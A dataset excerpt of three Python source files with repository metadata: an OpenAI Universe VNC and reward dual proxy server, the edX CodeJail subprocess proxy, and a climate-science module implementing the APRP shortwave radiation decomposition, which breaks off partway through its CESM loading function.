text stringlengths 0 1.05M | meta dict |
|---|---|
# a proxy server that handles both reward channel and vnc.
from twisted.python import log
from autobahn.twisted import websocket
import logging
import os
import time
import pexpect
import sys
import threading
from universe.vncdriver.vnc_proxy_server import VNCProxyServer
from universe.rewarder.reward_proxy_server import RewardProxyServer
from universe import utils
logger = logging.getLogger(__name__)
class DualProxyServer(VNCProxyServer):
def __init__(self, action_queue=None, error_buffer=None, enable_logging=True):
self._log_info('DualProxyServer inited')
self.reward_proxy = None
super(DualProxyServer, self).__init__(action_queue, error_buffer, enable_logging)
def _log_info(self, msg, *args, **kwargs):
logger.info('[dual_proxy] ' + msg, *args, **kwargs)
def recv_ClientInit(self, block):
# start reward proxy.
self._log_info('Starting reward proxy server')
self.reward_proxy = pexpect.spawnu(self.factory.reward_proxy_bin,
logfile=sys.stdout,
timeout=None)
# wait on reward proxy to be up.
self._log_info('Waiting for reward proxy server')
self.reward_proxy.expect('\[RewardProxyServer\]')
self.reward_proxy_thread = threading.Thread(target=lambda: self.reward_proxy.expect(pexpect.EOF))
self.reward_proxy_thread.start()
self._log_info('Reward proxy server is up %s', self.reward_proxy.before)
super(DualProxyServer, self).recv_ClientInit(block)
self.logfile_dir = self.log_manager.logfile_dir
def close(self):
# end connections.
super(DualProxyServer, self).close()
# wait for rewarder to close.
if self.reward_proxy:
self.reward_proxy.terminate()
# upload to s3.
# probably hacky right now.
logger.info('log manager = %s', self.log_manager)
if self.log_manager:
os.system('/app/universe/bin/upload_directory.sh demonstrator_%(recorder_id)s %(directory)s %(bucket)s' %
dict(recorder_id=self.factory.recorder_id, directory=self.logfile_dir,
bucket=self.factory.bucket)
)
| {
"repo_name": "openai/universe",
"path": "universe/vncdriver/dual_proxy_server.py",
"copies": "2",
"size": "2271",
"license": "mit",
"hash": -6322280845916708000,
"line_mean": 35.0476190476,
"line_max": 117,
"alpha_frac": 0.6428885953,
"autogenerated": false,
"ratio": 3.9427083333333335,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5585596928633333,
"avg_score": null,
"num_lines": null
} |
"""A proxy subprocess-making process for CodeJail."""
import ast
import logging
import os
import os.path
import subprocess
import sys
import time
import six
from six.moves import range
from .subproc import run_subprocess
log = logging.getLogger("codejail")
# We use .readline to get data from the pipes between the processes, so we need
# to ensure that a newline does not appear in the data. We also need a way to
# communicate a few values, and unpack them. Lastly, we need to be sure we can
# handle binary data. Serializing with repr() and deserializing the literals
# that result give us all the properties we need.
if six.PY2:
# Python 2: everything is bytes everywhere.
serialize_in = serialize_out = repr
deserialize_in = deserialize_out = ast.literal_eval
else:
# Python 3: the outside of subprocess talks in bytes (the pipes from
# subprocess.* are all about bytes). The inside of the Python code it runs
# talks in text (reading from sys.stdin is text, writing to sys.stdout
# expects text).
def serialize_out(val):
"""Send data out of the proxy process. Needs to make unicode."""
return repr(val)
def serialize_in(val):
"""Send data into the proxy process. Needs to make bytes."""
return serialize_out(val).encode('utf8')
def deserialize_in(ustr):
"""Get data into the proxy process. Needs to take unicode."""
return ast.literal_eval(ustr)
def deserialize_out(bstr):
"""Get data from the proxy process. Needs to take bytes."""
return deserialize_in(bstr.decode('utf8'))
##
# Client code, runs in the parent CodeJail process.
##
def run_subprocess_through_proxy(*args, **kwargs):
"""
Works just like :ref:`run_subprocess`, but through the proxy process.
This will retry a few times if need be.
"""
last_exception = None
for _tries in range(3):
try:
proxy = get_proxy()
# Write the args and kwargs to the proxy process.
proxy_stdin = serialize_in((args, kwargs))
proxy.stdin.write(proxy_stdin+b"\n")
proxy.stdin.flush()
# Read the result from the proxy. This blocks until the process
# is done.
proxy_stdout = proxy.stdout.readline()
if not proxy_stdout:
# EOF: the proxy must have died.
raise Exception("Proxy process died unexpectedly!")
status, stdout, stderr, log_calls = deserialize_out(proxy_stdout.rstrip())
# Write all the log messages to the log, and return.
for level, msg, args in log_calls:
log.log(level, msg, *args)
return status, stdout, stderr
except Exception: # pylint: disable=broad-except
log.exception("Proxy process failed")
# Give the proxy process a chance to die completely if it is dying.
time.sleep(.001)
last_exception = sys.exc_info()
continue
# If we finished all the tries, then raise the last exception we got.
if last_exception:
six.reraise(*last_exception)
# There is one global proxy process.
PROXY_PROCESS = None
def get_proxy():
# pylint: disable=missing-function-docstring
global PROXY_PROCESS # pylint: disable=global-statement
# If we had a proxy process, but it died, clean up.
if PROXY_PROCESS is not None:
status = PROXY_PROCESS.poll()
if status is not None:
log.info(
"CodeJail proxy process (pid %d) ended with status code %d",
PROXY_PROCESS.pid,
status
)
PROXY_PROCESS = None
# If we need a proxy, make a proxy.
if PROXY_PROCESS is None:
# Start the proxy by invoking proxy_main.py in our root directory.
root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
proxy_main_py = os.path.join(root, "proxy_main.py")
# Run proxy_main.py with the same Python that is running us. "-u" makes
# the stdin and stdout unbuffered. We pass the log level of the
# "codejail" log so that the proxy can send back an appropriate level
# of detail in the log messages.
log_level = log.getEffectiveLevel()
cmd = [sys.executable, '-u', proxy_main_py, str(log_level)]
PROXY_PROCESS = subprocess.Popen(
args=cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
log.info("Started CodeJail proxy process (pid %d)", PROXY_PROCESS.pid)
return PROXY_PROCESS
##
# Proxy process code
##
class CapturingHandler(logging.Handler):
"""
A logging Handler that captures all the log calls, for later replay.
NOTE: this doesn't capture all aspects of the log record. It only captures
the log level, the message string, and the arguments. It does not capture
the caller, the current exception, the current time, etc.
"""
# pylint wants us to override emit().
# pylint: disable=abstract-method
def __init__(self):
super().__init__()
self.log_calls = []
def createLock(self):
self.lock = None
def handle(self, record):
self.log_calls.append((record.levelno, record.msg, record.args))
def get_log_calls(self):
# pylint: disable=missing-function-docstring
retval = self.log_calls
self.log_calls = []
return retval
def proxy_main(argv):
"""
The main program for the proxy process.
It does this:
* Reads a line from stdin with the repr of a tuple: (args, kwargs)
* Calls :ref:`run_subprocess` with *args, **kwargs
* Writes one line to stdout: the repr of the return value from
`run_subprocess` and the log calls made:
(status, stdout, stderr, log_calls) .
The process ends when its stdin is closed.
`argv` is the argument list of the process, from sys.argv. The only
argument is the logging level for the "codejail" log in the parent
process. Since we tunnel our logging back to the parent, we don't want to
send everything, just the records that the parent will actually log.
"""
# We don't want to see any noise on stderr.
sys.stderr = open(os.devnull, "w")
# Capture all logging messages.
capture_log = CapturingHandler()
log.addHandler(capture_log)
log.setLevel(int(argv[1]) or logging.DEBUG)
log.debug("Starting proxy process")
try:
while True:
stdin = sys.stdin.readline()
log.debug("proxy stdin: %r", stdin)
if not stdin:
break
args, kwargs = deserialize_in(stdin.rstrip())
status, stdout, stderr = run_subprocess(*args, **kwargs)
log.debug(
"run_subprocess result: status=%r\nstdout=%r\nstderr=%r",
status, stdout, stderr,
)
log_calls = capture_log.get_log_calls()
stdout = serialize_out((status, stdout, stderr, log_calls))
sys.stdout.write(stdout+"\n")
sys.stdout.flush()
except Exception: # pylint: disable=broad-except
# Note that this log message will not get back to the parent, because
# we are dying and not communicating back to the parent. This will be
# useful only if you add another handler at the top of this function.
log.exception("Proxy dying due to exception")
log.debug("Exiting proxy process")
| {
"repo_name": "edx/codejail",
"path": "codejail/proxy.py",
"copies": "1",
"size": "7585",
"license": "apache-2.0",
"hash": 4488364234049718000,
"line_mean": 33.1666666667,
"line_max": 86,
"alpha_frac": 0.6287409361,
"autogenerated": false,
"ratio": 4.106659447753113,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5235400383853113,
"avg_score": null,
"num_lines": null
} |
# APRP.py: module containing functions, etc. related to the Approximate Partial Radiation Perturbation method
# (Taylor et al., 2007). Based on Matlab code written by Yen-Ting Hwang.
#
# To run, import this module into an outside script and then run "aprp_main" for
# the desired model
import numpy as np
import netCDF4 as nc4
#Main function to run, for an individual model (which model is specified via the "dataPaths" arguments).
#This version assumes variable names and dimensions following CMIP convention.
#
#Inputs:
# dataPaths1: dictionary of paths to the netCDF output for time period 1
# firstMonth1: first month (indexed from beginning of output) for time period 1--note Python indices start with 0
# lastMonth1: last month (indexed from beginning of output) for time period 1
# dataPaths2: dictionary of paths to the netCDF output for time period 2
# (if the two states being compared are different times from the same run, make this the same as dataPaths1)
# firstMonth2: first month (indexed from beginning of output) for time period 2
# lastMonth2: last month (indexed from beginning of output) for time period 2
#
#Outputs:
# A dictionary of dictionaries:
# returnDict['APRP']: contains results from comparing the two time periods (see "d_albedo" function for list of variables)
# returnDict['Time1_preliminaries']: contains the relevant model output variables, having been read in from NetCDF
# files, and processed including cloudy-sky calculations and multiannual means
# returnDict['Time2_preliminaries']: same as above but for time period 2 (see "loadNetCDF" function for list of variables)
# returnDict['Time1_parameters']: contains tuning parameters for the idealized single-layer radiative transfer model
# returnDict['Time2_parameters']: same as above but for time period 2 (see "parameters" function for list of variables)
# Syntax for accessing: e.g. to get the radiative effect of surface albedo changes, type returnDict['APRP']['surface']
#
def aprp_main(dataPaths1, firstMonth1, lastMonth1, dataPaths2, firstMonth2, lastMonth2):
#Load files and run calculations for first time period
dict1A = loadNetCDF(dataPaths1, firstMonth1, lastMonth1)
dict1B = parameters(dict1A)
#Load files and run calculations for second time period
dict2A = loadNetCDF(dataPaths2, firstMonth2, lastMonth2)
dict2B = parameters(dict2A)
#Run calculations regarding change betweeen 2 time periods
dictC = d_albedo(dict1A, dict1B, dict2A, dict2B)
#Nest the dictionaries into an outside dictionary to return
returnDict = dict()
returnDict['APRP'] = dictC
returnDict['Time1_preliminaries'] = dict1A
returnDict['Time1_parameters'] = dict1B
returnDict['Time2_preliminaries'] = dict2A
returnDict['Time2_parameters'] = dict2B
return returnDict
#Load variables from netCDF files (run twice, once for each time) and calculate overcast sky data.
#Based on "load_nc_coupled.m" in Ting's code.
#Inputs: see aprp_main
#Outputs: a dictionary containing monthly mean SW fluxes at surface and TOA under all-sky, clear-sky and
# overcast conditions, as well as the model's latitude and longitude grids. These are monthly mean
# data; unlike in Ting's code, not doing multi-annual mean yet. Better to do APRP calculations on
# the individual months.
def loadNetCDF(dataPaths, firstMonth, lastMonth):
#Variable names from CMIP convention (dictionary of data paths should have labels corresponding to these)
#variables = ['rsds', 'rsus', 'rsut', 'rsdt', 'rsutcs', 'rsdscs', 'rsuscs', 'clt']
#For each of the variables, import the netCDF file and extract array from the netCDF Dataset object, subsetted
#...by the times specified in the arguments (Ting used a loop with "eval" but I'd rather avoid that
#...for readability) and mask values greater than 10^10
Dataset = nc4.Dataset(dataPaths['rsds'])
rsds = Dataset.variables['rsds'][firstMonth:lastMonth+1, :,:]
rsds = np.ma.masked_greater(rsds,1.e10)
Dataset = nc4.Dataset(dataPaths['rsus'])
rsus = Dataset.variables['rsus'][firstMonth:lastMonth+1, :,:]
rsus = np.ma.masked_greater(rsus,1.e10)
Dataset = nc4.Dataset(dataPaths['rsut'])
rsut = Dataset.variables['rsut'][firstMonth:lastMonth+1, :,:]
rsut = np.ma.masked_greater(rsut,1.e10)
Dataset = nc4.Dataset(dataPaths['rsdt'])
rsdt = Dataset.variables['rsdt'][firstMonth:lastMonth+1, :,:]
rsdt = np.ma.masked_greater(rsdt,1.e10)
Dataset = nc4.Dataset(dataPaths['rsutcs'])
rsutcs = Dataset.variables['rsutcs'][firstMonth:lastMonth+1, :,:]
rsutcs = np.ma.masked_greater(rsutcs,1.e10)
Dataset = nc4.Dataset(dataPaths['rsdscs'])
rsdscs = Dataset.variables['rsdscs'][firstMonth:lastMonth+1, :,:]
rsdscs = np.ma.masked_greater(rsdscs,1.e10)
Dataset = nc4.Dataset(dataPaths['rsuscs'])
rsuscs = Dataset.variables['rsuscs'][firstMonth:lastMonth+1, :,:]
rsuscs = np.ma.masked_greater(rsuscs,1.e10)
Dataset = nc4.Dataset(dataPaths['clt'])
clt = Dataset.variables['clt'][firstMonth:lastMonth+1, :,:]
clt = np.ma.masked_greater(clt,1.e10)
#Alternative to the repetitive code above: shorter but harder to read/debug
#for variable in variables:
# Dataset = nc4.Dataset(dataPaths[variable])
# eval(variable+'= Dataset.variables['+variable+'][firstMonth:lastMonth+1, :,:]')
# eval(variable+'= np.ma.masked_greater('+variable+', 1.e10)')
#Obtain the latitude and longitude for the model (using last Dataset in the loop which should still be available)
lat = Dataset.variables['lat'][:]
lon = Dataset.variables['lon'][:]
#Here Ting calculated multi-year means for individual months. I need to do this too.
#Dimensions are time, lat, lon
#Need to average over every 12th time element, leave the lat and lon dependence.
#Will end up with a 3D array whose dimensions are month (1-12), lat, lon.
#What is best way to do this?
#Ting looped over the 12 months.
#She also saved separate 1-month means, but never used them so I'll skip that for now.
numMonths = lastMonth - firstMonth + 1
m_rsds = np.zeros([12,len(lat),len(lon)])
m_rsus = np.zeros([12,len(lat),len(lon)])
m_rsut = np.zeros([12,len(lat),len(lon)])
m_rsdt = np.zeros([12,len(lat),len(lon)])
m_rsutcs = np.zeros([12,len(lat),len(lon)])
m_rsdscs = np.zeros([12,len(lat),len(lon)])
m_rsuscs = np.zeros([12,len(lat),len(lon)])
m_clt = np.zeros([12,len(lat),len(lon)])
for i in range(0,12):
m_rsds[i,:,:] = np.mean(rsds[i:numMonths:12,:,:], axis=0)
m_rsus[i,:,:] = np.mean(rsus[i:numMonths:12,:,:], axis=0)
m_rsut[i,:,:] = np.mean(rsut[i:numMonths:12,:,:], axis=0)
m_rsdt[i,:,:] = np.mean(rsdt[i:numMonths:12,:,:], axis=0)
m_rsutcs[i,:,:] = np.mean(rsutcs[i:numMonths:12,:,:], axis=0)
m_rsdscs[i,:,:] = np.mean(rsdscs[i:numMonths:12,:,:], axis=0)
m_rsuscs[i,:,:] = np.mean(rsuscs[i:numMonths:12,:,:], axis=0)
m_clt[i,:,:] = np.mean(clt[i:numMonths:12,:,:], axis=0)
#Calculate the overcast versions of rsds, rsus, rsut from the clear-sky and all-sky data
#First mask zero values of cloud fraction so you don't calculate overcast values in clear-sky pixels
m_clt = np.ma.masked_values(m_clt, 0)
c = m_clt/100. #c is cloud fraction. clt was in percentages
m_rsdsoc = (m_rsds-(1.-c)*(m_rsdscs))/c #Can derive this algebraically from Taylor et al., 2007, Eq. 3
m_rsusoc = (m_rsus-(1.-c)*(m_rsuscs))/c
m_rsutoc = (m_rsut-(1.-c)*(m_rsutcs))/c
#Mask zero values of the downward SW radiation (I assume this means polar night, for monthly mean)
m_rsds = np.ma.masked_values(m_rsds, 0)
m_rsdscs = np.ma.masked_values(m_rsdscs, 0)
m_rsdsoc = np.ma.masked_values(m_rsdsoc, 0)
m_rsdt = np.ma.masked_values(m_rsdt, 0)
#Return dictionary with all the variables calculated here (called "dictA" because calculated in first function called)
dictA = dict()
dictA['rsds'] = m_rsds
dictA['rsus'] = m_rsus
dictA['rsut'] = m_rsut
dictA['rsdt'] = m_rsdt
dictA['rsutcs'] = m_rsutcs
dictA['rsdscs'] = m_rsdscs
dictA['rsuscs'] = m_rsuscs
dictA['clt'] = m_clt
dictA['lat'] = lat
dictA['lon'] = lon
dictA['rsdsoc'] = m_rsdsoc
dictA['rsusoc'] = m_rsusoc
dictA['rsutoc'] = m_rsutoc
dictA['c'] = c #Cloud fraction as fraction, not %
return dictA
#Calculate the tuning parameters for the idealized single-layer radiative transfer model
#for the individual time period (i.e. control or warmed)
#See Figure 1 of Taylor et al., 2007, and other parts of that paper. Equations referenced are from there.
#
#Based on Ting's "parameters.m".
#
#Inputs: the dictionary output by loadNetCDF
#Outputs: a dictionary of additional outputs
def parameters(dictA):
#Clear-sky parameters
a_clr = dictA['rsuscs']/dictA['rsdscs'] #Surface albedo
Q = dictA['rsdscs']/dictA['rsdt'] #Ratio of incident surface flux to insolation
mu_clr = dictA['rsutcs']/dictA['rsdt']+Q*(1.-a_clr) #Atmospheric transmittance (Eq. 9) #"Invalid value in divide"
ga_clr = (mu_clr-Q)/(mu_clr-a_clr*Q) #Atmospheric scattering coefficient (Eq. 10)
#Overcast parameters
a_oc = dictA['rsusoc']/dictA['rsdsoc'] #Surface albedo
Q = dictA['rsdsoc']/dictA['rsdt'] #Ratio of incident surface flux to insolation
mu_oc = dictA['rsutoc']/dictA['rsdt']+Q*(1.-a_oc) #Atmospheric transmittance (Eq. 9)
ga_oc = (mu_oc-Q)/(mu_oc-a_oc*Q) #Atmospheric scattering coefficient (Eq. 10)
#Calculating cloudy parameters based on clear-sky and overcast ones
#Difference between _cld and _oc: _cld is due to the cloud itself, as opposed to
#scattering and absorption from all constituents including clouds in overcast skies.
mu_cld = mu_oc / mu_clr #Eq. 14
ga_cld = (ga_oc-1.)/(1.-ga_clr)+1. #Eq. 13
#Save the relevant variables to a dictionary for later use
dictB = dict()
dictB['a_clr'] = a_clr
dictB['a_oc'] = a_oc
dictB['mu_clr'] = mu_clr
dictB['mu_cld'] = mu_cld
dictB['ga_clr'] = ga_clr
dictB['ga_cld'] = ga_cld
#Ting saved a cloud fraction variable here--I did this in earlier function instead.
return dictB
#Calculations for the differences between time periods
def d_albedo(dict1A, dict1B, dict2A, dict2B):
#First, Ting set cloud values that were masked in one time period
#equal to the value in the other time period, assuming no cloud changes.
#I'll take these variables out of the dictionary before modifying them.
a_oc1 = dict1B['a_oc']
a_oc2 = dict2B['a_oc']
a_oc2[a_oc2.mask == True] = a_oc1[a_oc2.mask == True]
a_oc1[a_oc1.mask == True] = a_oc2[a_oc1.mask == True]
mu_cld1 = dict1B['mu_cld']
mu_cld2 = dict2B['mu_cld']
mu_cld2[mu_cld2.mask == True] = mu_cld1[mu_cld2.mask == True]
mu_cld1[mu_cld1.mask == True] = mu_cld2[mu_cld1.mask == True]
ga_cld1 = dict1B['ga_cld']
ga_cld2 = dict2B['ga_cld']
ga_cld2[ga_cld2.mask == True] = ga_cld1[ga_cld2.mask == True]
ga_cld1[ga_cld1.mask == True] = ga_cld2[ga_cld1.mask == True]
#Now a bunch of calls to the "albedo" function to see how the albedo changes as a result of
#...the changes to each of the radiative components.
#Retrieve other variables from dictionaries to make calls to albedo shorter/more readable
c1 = dict1A['c']
c2 = dict2A['c']
a_clr1 = dict1B['a_clr']
a_clr2 = dict2B['a_clr']
mu_clr1 = dict1B['mu_clr']
mu_clr2 = dict2B['mu_clr']
ga_clr1 = dict1B['ga_clr']
ga_clr2 = dict2B['ga_clr']
#Base state albedo
A1 = albedo(c1, a_clr1, a_oc1, mu_clr1, mu_cld1, ga_clr1, ga_cld1)
A2 = albedo(c2, a_clr2, a_oc2, mu_clr2, mu_cld2, ga_clr2, ga_cld2)
#Change in albedo due to each component (Taylor et al., 2007, Eq. 12b)
dA_c = .5*(albedo(c2, a_clr1, a_oc1, mu_clr1, mu_cld1, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c1, a_clr2, a_oc2, mu_clr2, mu_cld2, ga_clr2, ga_cld2))
dA_a_clr = .5*(albedo(c1, a_clr2, a_oc1, mu_clr1, mu_cld1, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr1, a_oc2, mu_clr2, mu_cld2, ga_clr2, ga_cld2))
dA_a_oc = .5*(albedo(c1, a_clr1, a_oc2, mu_clr1, mu_cld1, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc1, mu_clr2, mu_cld2, ga_clr2, ga_cld2))
dA_mu_clr = .5*(albedo(c1, a_clr1, a_oc1, mu_clr2, mu_cld1, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc2, mu_clr1, mu_cld2, ga_clr2, ga_cld2))
dA_mu_cld = .5*(albedo(c1, a_clr1, a_oc1, mu_clr1, mu_cld2, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc2, mu_clr2, mu_cld1, ga_clr2, ga_cld2))
dA_ga_clr = .5*(albedo(c1, a_clr1, a_oc1, mu_clr1, mu_cld1, ga_clr2, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc2, mu_clr2, mu_cld2, ga_clr1, ga_cld2))
dA_ga_cld = .5*(albedo(c1, a_clr1, a_oc1, mu_clr1, mu_cld1, ga_clr1, ga_cld2)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc2, mu_clr2, mu_cld2, ga_clr2, ga_cld1))
#Set changes due to overcast or cloudy sky parameters, or changes to clouds themselves, to zero
#...if cloud fraction is less than 3% in either time period
dA_a_oc[dict1A['c'] < .03] = 0
dA_a_oc[dict2A['c'] < .03] = 0
dA_mu_cld[dict1A['c'] < .03] = 0
dA_mu_cld[dict2A['c'] < .03] = 0
dA_ga_cld[dict1A['c'] < .03] = 0
dA_ga_cld[dict2A['c'] < .03] = 0
dA_c[dict1A['c'] < .03] = 0
dA_c[dict2A['c'] < .03] = 0
#Combine different components into changes due to surface albedo, atmospheric clear-sky and atmospheric cloudy-sky
dA_a = dA_a_clr + dA_a_oc #Eq. 16a
dA_cld = dA_mu_cld + dA_ga_cld + dA_c #Eq. 16b
dA_clr = dA_mu_clr + dA_ga_clr #Eq. 16c
#Set all planetary albedo changes = zero when incoming solar radaition is zero
#(This will replace NaNs with zeros in the polar night--affects annual means)
dA_a[dict2A['rsdt']<0.1] = 0
dA_clr[dict2A['rsdt']<0.1] = 0
dA_cld[dict2A['rsdt']<0.1] = 0
dA_a_clr[dict2A['rsdt']<0.1] = 0
dA_a_oc[dict2A['rsdt']<0.1] = 0
dA_mu_cld[dict2A['rsdt']<0.1] = 0
dA_ga_cld[dict2A['rsdt']<0.1] = 0
dA_c[dict2A['rsdt']<0.1] = 0
dA_mu_clr[dict2A['rsdt']<0.1] = 0
dA_ga_clr[dict2A['rsdt']<0.1] = 0
#Calculate radiative effects in W/m^2 by multiplying negative of planetary albedo changes by downward SW radation
#(This means positive changes mean more downward SW absorbed)
surface = -dA_a*dict2A['rsdt'] #Radiative effect of surface albedo changes
surface[dict2A['rsdt']<0.1] = 0
surface = np.ma.masked_outside(surface, -100, 100) # Ting called this "boundary for strange output"
cloud = -dA_cld*dict2A['rsdt'] #Radiative effect of cloud changes
cloud[dict2A['rsdt']<0.1] = 0
cloud = np.ma.masked_outside(cloud, -100, 100) # Ting called this "boundary for strange output"
noncloud = -dA_clr*dict2A['rsdt'] #Radiative effect of non-cloud SW changes (e.g. SW absorption)
noncloud[dict2A['rsdt']<0.1] = 0
#Broken down further into the individual terms in Eq. 16
surface_clr = -dA_a_clr*dict2A['rsdt'] #Effects of surface albedo in clear-sky conditions
surface_clr[dict2A['rsdt']<0.1] = 0
surface_oc = -dA_a_oc*dict2A['rsdt'] #Effects of surface albedo in overcast conditions
surface_oc[dict2A['rsdt']<0.1] = 0
cloud_c = -dA_c*dict2A['rsdt'] #Effects of changes in cloud fraction
cloud_c[dict2A['rsdt']<0.1] = 0
cloud_ga = -dA_ga_cld*dict2A['rsdt'] #Effects of atmospheric scattering in cloudy conditions
cloud_ga[dict2A['rsdt']<0.1] = 0
cloud_mu = -dA_mu_cld*dict2A['rsdt'] #Effects of atmospheric absorption in cloudy conditions
cloud_mu[dict2A['rsdt']<0.1] = 0
noncloud_ga = -dA_ga_clr*dict2A['rsdt'] #Effects of atmospheric scattering in clear-sky conditions
noncloud_ga[dict2A['rsdt']<0.1] = 0
noncloud_mu = -dA_mu_clr*dict2A['rsdt'] #Effects of atmospheric absorption in clear-sky conditions
noncloud_mu[dict2A['rsdt']<0.1] = 0
#Calculate more useful radiation output
CRF = dict1A['rsut'] - dict1A['rsutcs'] - dict2A['rsut'] + dict2A['rsutcs'] #Change in cloud radiative effect
cs = dict1A['rsutcs'] - dict2A['rsutcs'] #Change in clear-sky upward SW flux at TOA
#Define a dictionary to return all the variables calculated here
dictC = dict()
dictC['A1'] = A1
dictC['A2'] = A2
dictC['dA_c'] = dA_c
dictC['dA_a_clr'] = dA_a_clr
dictC['dA_a_oc'] = dA_a_oc
dictC['dA_mu_clr'] = dA_mu_clr
dictC['dA_mu_cld'] = dA_mu_cld
dictC['dA_ga_clr'] = dA_ga_clr
dictC['dA_ga_cld'] = dA_ga_cld
dictC['dA_a'] = dA_a
dictC['dA_cld'] = dA_cld
dictC['dA_clr'] = dA_clr
dictC['surface'] = surface
dictC['cloud'] = cloud
dictC['noncloud'] = noncloud
dictC['surface_clr'] = surface_clr
dictC['surface_oc'] = surface_oc
dictC['cloud_c'] = cloud_c
dictC['cloud_ga'] = cloud_ga
dictC['cloud_mu'] = cloud_mu
dictC['noncloud_ga'] = noncloud_ga
dictC['noncloud_mu'] = noncloud_mu
dictC['CRF'] = CRF
dictC['cs'] = cs
return dictC
#Function to calculate the planetary albedo, A.
#Inputs: (see Fig. 1 of Taylor et al., 2007)
# c: fraction of the region occupied by clouds
# a_clr: clear sky surface albedo (SW flux up / SW flux down)
# a_oc: overcast surface albedo
# mu_clr: clear-sky transmittance of SW radiation
# mu_cld: cloudy-sky transmittance of SW radiation
# ga_clr: clear-sky atmospheric scattering coefficient
# ga_cld: cloudy-sky atmospheric scattering coefficient
def albedo(c, a_clr, a_oc, mu_clr, mu_cld, ga_clr, ga_cld): #Labeled with equation numbers from Taylor et al. 2007
mu_oc = mu_clr*mu_cld #Eq. 14
ga_oc = 1. - (1.-ga_clr)*(1.-ga_cld) #Eq. 13
A_clr = mu_clr*ga_clr + mu_clr*a_clr*(1.-ga_clr)*(1.-ga_clr)/(1.-a_clr*ga_clr) #Eq. 7 (clear-sky)
A_oc = mu_oc*ga_oc + mu_oc*a_oc*(1.-ga_oc)*(1.-ga_oc)/(1.-a_oc*ga_oc) #Eq. 7 (overcast sky)
A = (1-c)*A_clr + c*A_oc #Eq. 15
return A
#### Alternative versions for CESM model runs with different output variable names ####
#Alternative main function to run the different loading function
def aprp_main_cesm(dataPaths1, firstMonth1, lastMonth1, dataPaths2, firstMonth2, lastMonth2):
#Load files and run calculations for first time period
dict1A = loadNetCDF_cesm(dataPaths1, firstMonth1, lastMonth1)
dict1B = parameters(dict1A)
#Load files and run calculations for second time period
dict2A = loadNetCDF_cesm(dataPaths2, firstMonth2, lastMonth2)
dict2B = parameters(dict2A)
#Run calculations regarding change betweeen 2 time periods
dictC = d_albedo(dict1A, dict1B, dict2A, dict2B)
#Nest the dictionaries into an outside dictionary to return
returnDict = dict()
returnDict['APRP'] = dictC
returnDict['Time1_preliminaries'] = dict1A
returnDict['Time1_parameters'] = dict1B
returnDict['Time2_preliminaries'] = dict2A
returnDict['Time2_parameters'] = dict2B
return returnDict
#Loading function for CESM output variable names (output the same as the loadNetCDF() function)
def loadNetCDF_cesm(dataPaths, firstMonth, lastMonth):
#Variable names from CAM output (dictionary of data paths should have labels corresponding to these)
#vars_CAM = ['FSDS', 'FSNS', 'FSUTOA', 'FSNTOA', 'FSNTOAC', 'FSDSC', 'FSNSC', 'CLDTOT']
#For each variable, import the netCDF file and extract array from the netCDF Dataset object, subsetted
#...by the times specified in the arguments
Dataset = nc4.Dataset(dataPaths['FSDS'])
FSDS = Dataset.variables['FSDS'][firstMonth:lastMonth+1, :,:]
FSDS = np.ma.masked_greater(FSDS,1.e10)
Dataset = nc4.Dataset(dataPaths['FSNS'])
FSNS = Dataset.variables['FSNS'][firstMonth:lastMonth+1, :,:]
FSNS = np.ma.masked_greater(FSNS,1.e10)
Dataset = nc4.Dataset(dataPaths['FSUTOA'])
FSUTOA = Dataset.variables['FSUTOA'][firstMonth:lastMonth+1, :,:]
FSUTOA = np.ma.masked_greater(FSUTOA,1.e10)
Dataset = nc4.Dataset(dataPaths['FSNTOA'])
FSNTOA = Dataset.variables['FSNTOA'][firstMonth:lastMonth+1, :,:]
FSNTOA = np.ma.masked_greater(FSNTOA,1.e10)
Dataset = nc4.Dataset(dataPaths['FSNTOAC'])
FSNTOAC = Dataset.variables['FSNTOAC'][firstMonth:lastMonth+1, :,:]
FSNTOAC = np.ma.masked_greater(FSNTOAC,1.e10)
Dataset = nc4.Dataset(dataPaths['FSDSC'])
FSDSC = Dataset.variables['FSDSC'][firstMonth:lastMonth+1, :,:]
FSDSC = np.ma.masked_greater(FSDSC,1.e10)
Dataset = nc4.Dataset(dataPaths['FSNSC'])
FSNSC = Dataset.variables['FSNSC'][firstMonth:lastMonth+1, :,:]
FSNSC = np.ma.masked_greater(FSNSC,1.e10)
Dataset = nc4.Dataset(dataPaths['CLDTOT'])
CLDTOT = Dataset.variables['CLDTOT'][firstMonth:lastMonth+1, :,:]
CLDTOT = np.ma.masked_greater(CLDTOT,1.e10)
#Variable names from CMIP convention (used in rest of the program)
#variables = ['rsds', 'rsus', 'rsut', 'rsdt', 'rsutcs', 'rsdscs', 'rsuscs', 'clt']
#Get the variables into the CMIP format/name convention (some are already fine; some need processing)
rsds = FSDS
rsut = FSUTOA
rsdscs = FSDSC
clt = CLDTOT
rsus = FSDS - FSNS #SW: positive down: net = down - up ---> up = down - net
rsdt = FSUTOA + FSNTOA #down = net + up
rsuscs = FSDSC - FSNSC
rsutcs = rsdt - FSNTOAC #Downward SW at TOA should be same regardless of clouds.
####### from here down, same as regular loadNetCDF #######
#Obtain the latitude and longitude for the model (using last Dataset in the loop which should still be available)
lat = Dataset.variables['lat'][:]
lon = Dataset.variables['lon'][:]
#Here Ting calculated multi-year means for individual months. I need to do this too.
#Dimensions are time, lat, lon
#Need to average over every 12th time element, leave the lat and lon dependence.
#Will end up with a 3D array whose dimensions are month (1-12), lat, lon.
#What is best way to do this?
#Ting looped over the 12 months.
#She also saved separate 1-month means, but never used them so I'll skip that for now.
numMonths = lastMonth - firstMonth + 1
m_rsds = np.zeros([12,len(lat),len(lon)])
m_rsus = np.zeros([12,len(lat),len(lon)])
m_rsut = np.zeros([12,len(lat),len(lon)])
m_rsdt = np.zeros([12,len(lat),len(lon)])
m_rsutcs = np.zeros([12,len(lat),len(lon)])
